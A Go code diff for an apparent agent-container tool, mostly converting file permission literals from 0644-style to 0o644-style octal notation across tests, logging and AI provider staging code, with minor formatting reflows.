+)
 
 // categorizedDeps holds dependencies sorted by type for Dockerfile generation.
 type categorizedDeps struct {

--- a/internal/deps/moat_init_volume_test.go
+++ b/internal/deps/moat_init_volume_test.go
@@ -176,14 +176,14 @@ func TestMoatInitScriptVolumePopulate(t *testing.T) {
 
 func mkdir(t *testing.T, p string) {
 	t.Helper()
-	if err := os.MkdirAll(p, 0755); err != nil {
+	if err := os.MkdirAll(p, 0o755); err != nil {
 		t.Fatal(err)
 	}
 }
 
 func write(t *testing.T, p, s string) {
 	t.Helper()
-	if err := os.WriteFile(p, []byte(s), 0644); err != nil {
+	if err := os.WriteFile(p, []byte(s), 0o644); err != nil {
 		t.Fatal(err)
 	}
 }

--- a/internal/e2e/docker_test.go
+++ b/internal/e2e/docker_test.go
@@ -469,7 +469,7 @@ func TestDockerDindBuildKitImageBuild(t *testing.T) {
 RUN echo "BuildKit E2E test image"
 CMD ["echo", "Hello from BuildKit"]
 `
-	if err := os.WriteFile(workspace+"/Dockerfile", []byte(dockerfile), 0644); err != nil {
+	if err := os.WriteFile(workspace+"/Dockerfile", []byte(dockerfile), 0o644); err != nil {
 		t.Fatalf("WriteFile Dockerfile: %v", err)
 	}
 

--- a/internal/e2e/e2e_test.go
+++ b/internal/e2e/e2e_test.go
@@ -647,7 +647,7 @@ func TestWorkspaceIsMounted(t *testing.T) {
 		// Create a test file in the workspace
 		testFile := "e2e-test-file.txt"
 		testContent := "e2e-test-content-xyz"
-		if err := os.WriteFile(filepath.Join(workspace, testFile), []byte(testContent), 0644); err != nil {
+		if err := os.WriteFile(filepath.Join(workspace, testFile), []byte(testContent), 0o644); err != nil {
 			t.Fatalf("WriteFile: %v", err)
 		}
 
@@ -774,7 +774,7 @@ func createTestWorkspace(t *testing.T) string {
 	yaml := `agent: e2e-test
 version: 1.0.0
 `
-	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0o644); err != nil {
 		t.Fatalf("WriteFile moat.yaml: %v", err)
 	}
 
@@ -790,7 +790,7 @@ func createTestWorkspaceWithRuntime(t *testing.T, rt, version string) string {
 
 	// Create moat.yaml with runtime
 	yaml := "agent: e2e-test\nversion: 1.0.0\nruntime:\n  " + rt + ": " + version + "\n"
-	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0o644); err != nil {
 		t.Fatalf("WriteFile moat.yaml: %v", err)
 	}
 
@@ -2035,7 +2035,7 @@ version: 1.0.0
 claude:
   sync_logs: true
 `
-	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0o644); err != nil {
 		t.Fatalf("WriteFile moat.yaml: %v", err)
 	}
 	return dir
@@ -2053,7 +2053,7 @@ func createTestWorkspaceWithDeps(t *testing.T, deps []string) string {
 	}
 
 	yaml := "agent: e2e-test\nversion: 1.0.0\ndependencies:\n" + depLines
-	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0o644); err != nil {
 		t.Fatalf("WriteFile moat.yaml: %v", err)
 	}
 

--- a/internal/e2e/endpoints_test.go
+++ b/internal/e2e/endpoints_test.go
@@ -126,7 +126,8 @@ func TestEndpointRoutingBasic(t *testing.T) {
 func TestEndpointRoutingMultiEndpoint(t *testing.T) {
 	env, cleanup := startEndpointRun(t, "e2e-multi-endpoint",
 		map[string]int{"web": 3000, "api": 8001},
-		[]string{"sh", "-c",
+		[]string{
+			"sh", "-c",
 			"python3 -m http.server 3000 --directory /tmp &" +
 				" python3 -m http.server 8001 --directory /workspace &" +
 				" wait",
@@ -280,7 +281,8 @@ func TestProxyTokenValidInContainer(t *testing.T) {
 			Name:      "e2e-proxy-token",
 			Workspace: workspace,
 			Grants:    []string{"github"},
-			Cmd: []string{"sh", "-c",
+			Cmd: []string{
+				"sh", "-c",
 				// Try to curl an HTTPS endpoint through the proxy.
 				// We use --write-out to capture the HTTP status code.
 				// If we get 407, the proxy token is invalid.
@@ -460,7 +462,7 @@ dependencies:
 ports:
 %s`, portsYAML)
 
-	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0o644); err != nil {
 		t.Fatalf("WriteFile moat.yaml: %v", err)
 	}
 

--- a/internal/e2e/mcp_test.go
+++ b/internal/e2e/mcp_test.go
@@ -224,7 +224,7 @@ mcp:
       grant: mcp-server2
       header: X-Server2-Key
 `
-	if err := os.WriteFile(filepath.Join(workspace, "moat.yaml"), []byte(agentYAML), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspace, "moat.yaml"), []byte(agentYAML), 0o644); err != nil {
 		t.Fatalf("WriteFile moat.yaml: %v", err)
 	}
 
@@ -437,7 +437,7 @@ mcp:
       grant: mcp-test
       header: X-Test-Key
 `
-	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(agentYAML), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(agentYAML), 0o644); err != nil {
 		t.Fatalf("WriteFile moat.yaml: %v", err)
 	}
 

--- a/internal/e2e/tui_test.go
+++ b/internal/e2e/tui_test.go
@@ -110,7 +110,8 @@ func TestAppleTUIWriterAltScreenDuringInit(t *testing.T) {
 		Name:        "e2e-tui-altscreen",
 		Workspace:   workspace,
 		Interactive: true,
-		Cmd: []string{"sh", "-c",
+		Cmd: []string{
+			"sh", "-c",
 			// Enter alt screen, write content, exit alt screen, write normal content
 			`printf '\033[?1049h'; echo 'in-alt-screen'; printf '\033[?1049l'; echo 'back-to-normal'`,
 		},

--- a/internal/e2e/volume_workspace_test.go
+++ b/internal/e2e/volume_workspace_test.go
@@ -123,10 +123,10 @@ func initVolumeTestRepo(t *testing.T) (string, string) {
 // writeFile writes content to path, creating parent directories.
 func writeFile(t *testing.T, path, content string) {
 	t.Helper()
-	if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Dir(path), 0o755); err != nil {
 		t.Fatalf("MkdirAll %s: %v", filepath.Dir(path), err)
 	}
-	if err := os.WriteFile(path, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(path, []byte(content), 0o644); err != nil {
 		t.Fatalf("WriteFile %s: %v", path, err)
 	}
 }

--- a/internal/e2e/volumes_test.go
+++ b/internal/e2e/volumes_test.go
@@ -393,7 +393,7 @@ func createTestWorkspaceWithVolumes(t *testing.T, agentName string, volumes []co
 	}
 
 	yaml := "name: " + agentName + "\nagent: e2e-test\nversion: 1.0.0\nvolumes:\n" + volLines
-	if err := os.WriteFile(dir+"/moat.yaml", []byte(yaml), 0644); err != nil {
+	if err := os.WriteFile(dir+"/moat.yaml", []byte(yaml), 0o644); err != nil {
 		t.Fatalf("WriteFile moat.yaml: %v", err)
 	}
 

--- a/internal/log/file.go
+++ b/internal/log/file.go
@@ -19,7 +19,7 @@ type FileWriter struct {
 
 // NewFileWriter creates a FileWriter that writes to dir/YYYY-MM-DD.jsonl.
 func NewFileWriter(dir string) (*FileWriter, error) {
-	if err := os.MkdirAll(dir, 0755); err != nil {
+	if err := os.MkdirAll(dir, 0o755); err != nil {
 		return nil, fmt.Errorf("creating debug log dir: %w", err)
 	}
 
@@ -70,7 +70,7 @@ func (fw *FileWriter) rotateLocked() error {
 	filename := today + ".jsonl"
 	path := filepath.Join(fw.dir, filename)
 
-	f, err := os.OpenFile(path, os.O_CREATE|os.O_APPEND|os.O_WRONLY, 0644)
+	f, err := os.OpenFile(path, os.O_CREATE|os.O_APPEND|os.O_WRONLY, 0o644)
 	if err != nil {
 		return fmt.Errorf("opening log file: %w", err)
 	}

--- a/internal/log/file_test.go
+++ b/internal/log/file_test.go
@@ -72,16 +72,16 @@ func TestCleanup(t *testing.T) {
 	// Create old log files
 	oldDate := time.Now().AddDate(0, 0, -20).Format("2006-01-02")
 	oldFile := filepath.Join(tmpDir, oldDate+".jsonl")
-	os.WriteFile(oldFile, []byte("old"), 0644)
+	os.WriteFile(oldFile, []byte("old"), 0o644)
 
 	// Create recent log file
 	recentDate := time.Now().AddDate(0, 0, -5).Format("2006-01-02")
 	recentFile := filepath.Join(tmpDir, recentDate+".jsonl")
-	os.WriteFile(recentFile, []byte("recent"), 0644)
+	os.WriteFile(recentFile, []byte("recent"), 0o644)
 
 	// Create non-log file (should be ignored)
 	otherFile := filepath.Join(tmpDir, "other.txt")
-	os.WriteFile(otherFile, []byte("other"), 0644)
+	os.WriteFile(otherFile, []byte("other"), 0o644)
 
 	// Run cleanup with 14 day retention
 	Cleanup(tmpDir, 14)

--- a/internal/log/integration_test.go
+++ b/internal/log/integration_test.go
@@ -16,7 +16,7 @@ func TestIntegration_FullLifecycle(t *testing.T) {
 	// Create some old files to test cleanup
 	oldDate := time.Now().AddDate(0, 0, -20).Format("2006-01-02")
 	oldFile := filepath.Join(tmpDir, oldDate+".jsonl")
-	os.WriteFile(oldFile, []byte("old log"), 0644)
+	os.WriteFile(oldFile, []byte("old log"), 0o644)
 
 	// Initialize logger
 	err := Init(Options{

--- a/internal/log/log.go
+++ b/internal/log/log.go
@@ -7,9 +7,11 @@ import (
 	"os"
 )
 
-var logger *slog.Logger
-var fileWriter *FileWriter
-var verbose bool
+var (
+	logger     *slog.Logger
+	fileWriter *FileWriter
+	verbose    bool
+)
 
 // Options configures the logger.
 type Options struct {

--- a/internal/providers/claude/agent.go
+++ b/internal/providers/claude/agent.go
@@ -25,7 +25,7 @@ func (p *OAuthProvider) PrepareContainer(ctx context.Context, opts provider.Prep
 	}
 
 	// Ensure proper permissions
-	if err := os.Chmod(tmpDir, 0700); err != nil {
+	if err := os.Chmod(tmpDir, 0o700); err != nil {
 		os.RemoveAll(tmpDir)
 		return nil, fmt.Errorf("setting permissions on staging dir: %w", err)
 	}
@@ -95,7 +95,7 @@ func (p *OAuthProvider) PrepareContainer(ctx context.Context, opts provider.Prep
 	if hostHomeErr == nil {
 		remoteSettingsPath := filepath.Join(hostHome, ".claude", "remote-settings.json")
 		if data, readErr := os.ReadFile(remoteSettingsPath); readErr == nil {
-			if writeErr := os.WriteFile(filepath.Join(tmpDir, "remote-settings.json"), data, 0600); writeErr != nil {
+			if writeErr := os.WriteFile(filepath.Join(tmpDir, "remote-settings.json"), data, 0o600); writeErr != nil {
 				log.Debug("failed to stage remote-settings.json", "error", writeErr)
 			}
 		}
@@ -103,7 +103,7 @@ func (p *OAuthProvider) PrepareContainer(ctx context.Context, opts provider.Prep
 
 	// Write runtime context file if provided
 	if opts.RuntimeContext != "" {
-		if err := os.WriteFile(filepath.Join(tmpDir, "CLAUDE.md"), []byte(opts.RuntimeContext), 0644); err != nil {
+		if err := os.WriteFile(filepath.Join(tmpDir, "CLAUDE.md"), []byte(opts.RuntimeContext), 0o644); err != nil {
 			return nil, fmt.Errorf("writing context file: %w", err)
 		}
 	}

--- a/internal/providers/claude/agent_test.go
+++ b/internal/providers/claude/agent_test.go
@@ -38,11 +38,11 @@ func TestPrepareContainer_copiesRemoteSettings(t *testing.T) {
 	// Set up a fake home with remote-settings.json
 	fakeHome := t.TempDir()
 	claudeDir := filepath.Join(fakeHome, ".claude")
-	if err := os.MkdirAll(claudeDir, 0755); err != nil {
+	if err := os.MkdirAll(claudeDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
 	settingsContent := `{"version":1,"settings":{"hooks":true}}`
-	if err := os.WriteFile(filepath.Join(claudeDir, "remote-settings.json"), []byte(settingsContent), 0600); err != nil {
+	if err := os.WriteFile(filepath.Join(claudeDir, "remote-settings.json"), []byte(settingsContent), 0o600); err != nil {
 		t.Fatal(err)
 	}
 	t.Setenv("HOME", fakeHome)
@@ -68,7 +68,7 @@ func TestPrepareContainer_copiesRemoteSettings(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	if perm := info.Mode().Perm(); perm != 0600 {
+	if perm := info.Mode().Perm(); perm != 0o600 {
 		t.Errorf("remote-settings.json permissions = %o, want 0600", perm)
 	}
 }
@@ -76,7 +76,7 @@ func TestPrepareContainer_copiesRemoteSettings(t *testing.T) {
 func TestPrepareContainer_skipsRemoteSettingsWhenMissing(t *testing.T) {
 	// Set up a fake home without remote-settings.json
 	fakeHome := t.TempDir()
-	if err := os.MkdirAll(filepath.Join(fakeHome, ".claude"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(fakeHome, ".claude"), 0o755); err != nil {
 		t.Fatal(err)
 	}
 	t.Setenv("HOME", fakeHome)

--- a/internal/providers/claude/cli_test.go
+++ b/internal/providers/claude/cli_test.go
@@ -241,10 +241,10 @@ func TestResolveClaudeCredential_SkipsMigrationInReadOnlyDir(t *testing.T) {
 	}
 
 	// Make directory read-only to prevent migration writes
-	if err := os.Chmod(dir, 0555); err != nil {
+	if err := os.Chmod(dir, 0o555); err != nil {
 		t.Fatal(err)
 	}
-	defer os.Chmod(dir, 0755) // restore for cleanup
+	defer os.Chmod(dir, 0o755) // restore for cleanup
 
 	// Should fall through to "anthropic" since migration can't write
 	got := resolveClaudeCredential(store)
@@ -264,7 +264,7 @@ func writeTestMetadata(t *testing.T, baseDir, runID string, meta storage.Metadat
 	if err != nil {
 		t.Fatal(err)
 	}
-	if err := os.WriteFile(store.Dir()+"/metadata.json", data, 0600); err != nil {
+	if err := os.WriteFile(store.Dir()+"/metadata.json", data, 0o600); err != nil {
 		t.Fatal(err)
 	}
 }

--- a/internal/providers/claude/config.go
+++ b/internal/providers/claude/config.go
@@ -135,7 +135,7 @@ func WriteClaudeConfig(stagingDir string, mcpServers map[string]MCPServerForCont
 		return fmt.Errorf("marshaling claude config: %w", err)
 	}
 
-	if err := os.WriteFile(filepath.Join(stagingDir, ".claude.json"), data, 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(stagingDir, ".claude.json"), data, 0o644); err != nil {
 		return fmt.Errorf("writing .claude.json: %w", err)
 	}
 
@@ -205,7 +205,7 @@ func WriteCredentialsFile(cred *provider.Credential, stagingDir, subscriptionTyp
 		return fmt.Errorf("marshaling credentials: %w", err)
 	}
 
-	if writeErr := os.WriteFile(filepath.Join(stagingDir, ".credentials.json"), credsJSON, 0600); writeErr != nil {
+	if writeErr := os.WriteFile(filepath.Join(stagingDir, ".credentials.json"), credsJSON, 0o600); writeErr != nil {
 		return fmt.Errorf("writing credentials file: %w", writeErr)
 	}
 

--- a/internal/providers/claude/marketplace.go
+++ b/internal/providers/claude/marketplace.go
@@ -187,7 +187,7 @@ func CloneMarketplace(ctx context.Context, repo string) (dir string, commitTime 
 		// Clean dir contents for the next attempt (MkdirTemp created it,
 		// git clone may have partially populated it).
 		os.RemoveAll(dir)
-		if mkErr := os.MkdirAll(dir, 0700); mkErr != nil {
+		if mkErr := os.MkdirAll(dir, 0o700); mkErr != nil {
 			os.RemoveAll(dir)
 			return "", "", fmt.Errorf("recreating temp dir: %w", mkErr)
 		}

--- a/internal/providers/claude/provider_test.go
+++ b/internal/providers/claude/provider_test.go
@@ -572,7 +572,7 @@ func TestReadHostConfig(t *testing.T) {
 		}
 
 		data, _ := json.Marshal(full)
-		if err := os.WriteFile(path, data, 0644); err != nil {
+		if err := os.WriteFile(path, data, 0o644); err != nil {
 			t.Fatalf("failed to write test file: %v", err)
 		}
 

--- a/internal/providers/claude/session_test.go
+++ b/internal/providers/claude/session_test.go
@@ -36,7 +36,7 @@ func TestFindLatestSessionID(t *testing.T) {
 	t.Run("ignores non-UUID files", func(t *testing.T) {
 		dir := t.TempDir()
 		writeSessionFile(t, dir, "aaaaaaaa-1111-2222-3333-444455556666", runStart.Add(1*time.Minute))
-		if err := os.WriteFile(filepath.Join(dir, "not-a-uuid.jsonl"), []byte("data"), 0600); err != nil {
+		if err := os.WriteFile(filepath.Join(dir, "not-a-uuid.jsonl"), []byte("data"), 0o600); err != nil {
 			t.Fatal(err)
 		}
 
@@ -48,7 +48,7 @@ func TestFindLatestSessionID(t *testing.T) {
 
 	t.Run("ignores directories", func(t *testing.T) {
 		dir := t.TempDir()
-		if err := os.Mkdir(filepath.Join(dir, "aaaaaaaa-1111-2222-3333-444455556666"), 0755); err != nil {
+		if err := os.Mkdir(filepath.Join(dir, "aaaaaaaa-1111-2222-3333-444455556666"), 0o755); err != nil {
 			t.Fatal(err)
 		}
 
@@ -97,7 +97,7 @@ func TestOnRunStopped_NoWorkspace(t *testing.T) {
 func writeSessionFile(t *testing.T, dir, uuid string, modTime time.Time) {
 	t.Helper()
 	path := filepath.Join(dir, uuid+".jsonl")
-	if err := os.WriteFile(path, []byte(`{"type":"session"}`+"\n"), 0600); err != nil {
+	if err := os.WriteFile(path, []byte(`{"type":"session"}`+"\n"), 0o600); err != nil {
 		t.Fatal(err)
 	}
 	if err := os.Chtimes(path, modTime, modTime); err != nil {

--- a/internal/providers/claude/settings_test.go
+++ b/internal/providers/claude/settings_test.go
@@ -28,7 +28,7 @@ func TestLoadSettings(t *testing.T) {
     }
   }
 }`
-	if err := os.WriteFile(settingsPath, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(settingsPath, []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -94,7 +94,7 @@ func TestLoadSettingsGitHubRepoFormat(t *testing.T) {
     }
   }
 }`
-	if err := os.WriteFile(settingsPath, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(settingsPath, []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -156,7 +156,7 @@ func TestLoadSettingsInvalidRepoFormat(t *testing.T) {
     }
   }
 }`
-	if err := os.WriteFile(settingsPath, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(settingsPath, []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -297,7 +297,7 @@ func TestLoadAllSettings(t *testing.T) {
 	// Set up workspace with project settings
 	workspace := t.TempDir()
 	claudeDir := filepath.Join(workspace, ".claude")
-	if err := os.MkdirAll(claudeDir, 0755); err != nil {
+	if err := os.MkdirAll(claudeDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
 
@@ -306,7 +306,7 @@ func TestLoadAllSettings(t *testing.T) {
     "project-plugin@market": true
   }
 }`
-	if err := os.WriteFile(filepath.Join(claudeDir, "settings.json"), []byte(projectSettings), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(claudeDir, "settings.json"), []byte(projectSettings), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -340,7 +340,7 @@ func TestLoadAllSettingsSkipHostSettings(t *testing.T) {
 	// Set up a fake home with host-level settings that should be skipped.
 	fakeHome := t.TempDir()
 	claudeDir := filepath.Join(fakeHome, ".claude")
-	if err := os.MkdirAll(claudeDir, 0755); err != nil {
+	if err := os.MkdirAll(claudeDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
 	hostSettings := `{
@@ -349,18 +349,18 @@ func TestLoadAllSettingsSkipHostSettings(t *testing.T) {
     "host-market": { "source": { "source": "git", "url": "https://example.com/host.git" } }
   }
 }`
-	if err := os.WriteFile(filepath.Join(claudeDir, "settings.json"), []byte(hostSettings), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(claudeDir, "settings.json"), []byte(hostSettings), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
 	// Set up workspace with project settings that should still load.
 	workspace := t.TempDir()
 	projClaudeDir := filepath.Join(workspace, ".claude")
-	if err := os.MkdirAll(projClaudeDir, 0755); err != nil {
+	if err := os.MkdirAll(projClaudeDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
 	projSettings := `{ "enabledPlugins": { "proj-plugin@proj-market": true } }`
-	if err := os.WriteFile(filepath.Join(projClaudeDir, "settings.json"), []byte(projSettings), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(projClaudeDir, "settings.json"), []byte(projSettings), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -596,7 +596,7 @@ func TestLoadKnownMarketplaces(t *testing.T) {
     "lastUpdated": "2026-01-24T00:50:43.196Z"
   }
 }`
-	if err := os.WriteFile(path, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(path, []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -653,7 +653,7 @@ func TestLoadKnownMarketplacesGitSource(t *testing.T) {
     "lastUpdated": "2026-01-24T00:50:41.204Z"
   }
 }`
-	if err := os.WriteFile(path, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(path, []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -681,7 +681,7 @@ func TestLoadKnownMarketplacesMalformedJSON(t *testing.T) {
 
 	// Invalid JSON
 	content := `{ invalid json }`
-	if err := os.WriteFile(path, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(path, []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -714,7 +714,7 @@ func TestLoadKnownMarketplacesInvalidRepoFormat(t *testing.T) {
     "lastUpdated": "2026-01-24T00:50:41.204Z"
   }
 }`
-	if err := os.WriteFile(path, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(path, []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -760,7 +760,7 @@ func TestLoadKnownMarketplacesEmptyURL(t *testing.T) {
     "lastUpdated": "2026-01-24T00:50:41.204Z"
   }
 }`
-	if err := os.WriteFile(path, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(path, []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -849,7 +849,7 @@ func TestLoadSettingsPreservesUnknownFields(t *testing.T) {
   },
   "customUnknownField": "preserved"
 }`
-	if err := os.WriteFile(settingsPath, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(settingsPath, []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -893,7 +893,7 @@ func TestSettingsRoundTripWithExtras(t *testing.T) {
   },
   "customField": 42
 }`
-	if err := os.WriteFile(settingsPath, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(settingsPath, []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -933,7 +933,7 @@ func TestLoadAllSettingsPreservesMoatUserExtras(t *testing.T) {
 	t.Setenv("MOAT_SKIP_HOST_CLAUDE_SETTINGS", "")
 
 	moatClaudeDir := filepath.Join(fakeHome, ".moat", "claude")
-	if err := os.MkdirAll(moatClaudeDir, 0755); err != nil {
+	if err := os.MkdirAll(moatClaudeDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
 	moatSettings := `{
@@ -941,21 +941,21 @@ func TestLoadAllSettingsPreservesMoatUserExtras(t *testing.T) {
   "statusLine": { "command": "date" },
   "customSetting": "from-moat-user"
 }`
-	if err := os.WriteFile(filepath.Join(moatClaudeDir, "settings.json"), []byte(moatSettings), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(moatClaudeDir, "settings.json"), []byte(moatSettings), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
 	// Set up workspace with project settings that also have unknown fields.
 	workspace := t.TempDir()
 	projClaudeDir := filepath.Join(workspace, ".claude")
-	if err := os.MkdirAll(projClaudeDir, 0755); err != nil {
+	if err := os.MkdirAll(projClaudeDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
 	projSettings := `{
   "enabledPlugins": { "proj-plugin@market": true },
   "projectOnlySetting": "should-be-dropped"
 }`
-	if err := os.WriteFile(filepath.Join(projClaudeDir, "settings.json"), []byte(projSettings), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(projClaudeDir, "settings.json"), []byte(projSettings), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -1068,7 +1068,7 @@ func TestSettingsJSONRoundTrip(t *testing.T) {
 		t.Fatalf("json.MarshalIndent: %v", err)
 	}
 
-	if err := os.WriteFile(path, data, 0644); err != nil {
+	if err := os.WriteFile(path, data, 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -1261,10 +1261,10 @@ func TestMergeSettingsTui(t *testing.T) {
 func TestLoadAllSettingsMirrorsHostTui(t *testing.T) {
 	fakeHome := t.TempDir()
 	claudeDir := filepath.Join(fakeHome, ".claude")
-	if err := os.MkdirAll(claudeDir, 0755); err != nil {
+	if err := os.MkdirAll(claudeDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
-	if err := os.WriteFile(filepath.Join(claudeDir, "settings.json"), []byte(`{"tui":"fullscreen"}`), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(claudeDir, "settings.json"), []byte(`{"tui":"fullscreen"}`), 0o644); err != nil {
 		t.Fatal(err)
 	}
 

--- a/internal/providers/codex/agent.go
+++ b/internal/providers/codex/agent.go
@@ -41,7 +41,7 @@ func (p *Provider) PrepareContainer(ctx context.Context, opts provider.PrepareOp
 
 	// Write runtime context file if provided
 	if opts.RuntimeContext != "" {
-		if err := os.WriteFile(filepath.Join(tmpDir, "AGENTS.md"), []byte(opts.RuntimeContext), 0644); err != nil {
+		if err := os.WriteFile(filepath.Join(tmpDir, "AGENTS.md"), []byte(opts.RuntimeContext), 0o644); err != nil {
 			cleanupFn()
 			return nil, fmt.Errorf("writing context file: %w", err)
 		}
@@ -65,7 +65,7 @@ func (p *Provider) PrepareContainer(ctx context.Context, opts provider.PrepareOp
 			cleanupFn()
 			return nil, fmt.Errorf("marshaling MCP config: %w", err)
 		}
-		if err := os.WriteFile(filepath.Join(tmpDir, "mcp.json"), mcpJSON, 0644); err != nil {
+		if err := os.WriteFile(filepath.Join(tmpDir, "mcp.json"), mcpJSON, 0o644); err != nil {
 			cleanupFn()
 			return nil, fmt.Errorf("writing MCP config: %w", err)
 		}
@@ -113,7 +113,7 @@ func PopulateStagingDir(cred *provider.Credential, stagingDir string) error {
 		return fmt.Errorf("marshaling auth file: %w", err)
 	}
 
-	if writeErr := os.WriteFile(filepath.Join(stagingDir, "auth.json"), authJSON, 0600); writeErr != nil {
+	if writeErr := os.WriteFile(filepath.Join(stagingDir, "auth.json"), authJSON, 0o600); writeErr != nil {
 		return fmt.Errorf("writing auth file: %w", writeErr)
 	}
 

--- a/internal/providers/codex/config.go
+++ b/internal/providers/codex/config.go
@@ -18,7 +18,7 @@ func WriteCodexConfig(stagingDir string) error {
 inherit = "core"
 `
 
-	if err := os.WriteFile(filepath.Join(stagingDir, "config.toml"), []byte(configContent), 0600); err != nil {
+	if err := os.WriteFile(filepath.Join(stagingDir, "config.toml"), []byte(configContent), 0o600); err != nil {
 		return fmt.Errorf("writing config.toml: %w", err)
 	}
 

--- a/internal/providers/codex/provider_test.go
+++ b/internal/providers/codex/provider_test.go
@@ -107,7 +107,6 @@ func TestProvider_ContainerMounts(t *testing.T) {
 	}
 
 	mounts, cleanupPath, err := p.ContainerMounts(cred, "/home/testuser")
-
 	if err != nil {
 		t.Errorf("ContainerMounts() error = %v", err)
 	}

--- a/internal/providers/gemini/agent.go
+++ b/internal/providers/gemini/agent.go
@@ -40,7 +40,7 @@ func (p *Provider) PrepareContainer(ctx context.Context, opts provider.PrepareOp
 
 	// Write runtime context file if provided
 	if opts.RuntimeContext != "" {
-		if err := os.WriteFile(filepath.Join(tmpDir, "GEMINI.md"), []byte(opts.RuntimeContext), 0644); err != nil {
+		if err := os.WriteFile(filepath.Join(tmpDir, "GEMINI.md"), []byte(opts.RuntimeContext), 0o644); err != nil {
 			cleanupFn()
 			return nil, fmt.Errorf("writing context file: %w", err)
 		}
@@ -64,7 +64,7 @@ func (p *Provider) PrepareContainer(ctx context.Context, opts provider.PrepareOp
 			cleanupFn()
 			return nil, fmt.Errorf("marshaling MCP config: %w", err)
 		}
-		if err := os.WriteFile(filepath.Join(tmpDir, "mcp.json"), mcpJSON, 0644); err != nil {
+		if err := os.WriteFile(filepath.Join(tmpDir, "mcp.json"), mcpJSON, 0o644); err != nil {
 			cleanupFn()
 			return nil, fmt.Errorf("writing MCP config: %w", err)
 		}
@@ -118,7 +118,7 @@ func populateOAuthStagingDir(stagingDir string) error {
 	if err != nil {
 		return fmt.Errorf("marshaling oauth_creds.json: %w", err)
 	}
-	if err := os.WriteFile(filepath.Join(stagingDir, "oauth_creds.json"), credsData, 0600); err != nil {
+	if err := os.WriteFile(filepath.Join(stagingDir, "oauth_creds.json"), credsData, 0o600); err != nil {
 		return fmt.Errorf("writing oauth_creds.json: %w", err)
 	}
 
@@ -142,7 +142,7 @@ func writeSettings(stagingDir, authType string) error {
 	if err != nil {
 		return fmt.Errorf("marshaling settings.json: %w", err)
 	}
-	if err := os.WriteFile(filepath.Join(stagingDir, "settings.json"), data, 0600); err != nil {
+	if err := os.WriteFile(filepath.Join(stagingDir, "settings.json"), data, 0o600); err != nil {
 		return fmt.Errorf("writing settings.json: %w", err)
 	}
 	return nil

--- a/internal/providers/github/provider_test.go
+++ b/internal/providers/github/provider_test.go
@@ -115,11 +115,11 @@ func TestProvider_ContainerInitFiles(t *testing.T) {
 	// Create a temp gh config to test with
 	tmpHome := t.TempDir()
 	ghConfigDir := filepath.Join(tmpHome, ".config", "gh")
-	if err := os.MkdirAll(ghConfigDir, 0700); err != nil {
+	if err := os.MkdirAll(ghConfigDir, 0o700); err != nil {
 		t.Fatal(err)
 	}
 	configContent := "git_protocol: ssh\neditor: vim\n"
-	if err := os.WriteFile(filepath.Join(ghConfigDir, "config.yml"), []byte(configContent), 0600); err != nil {
+	if err := os.WriteFile(filepath.Join(ghConfigDir, "config.yml"), []byte(configContent), 0o600); err != nil {
 		t.Fatal(err)
 	}
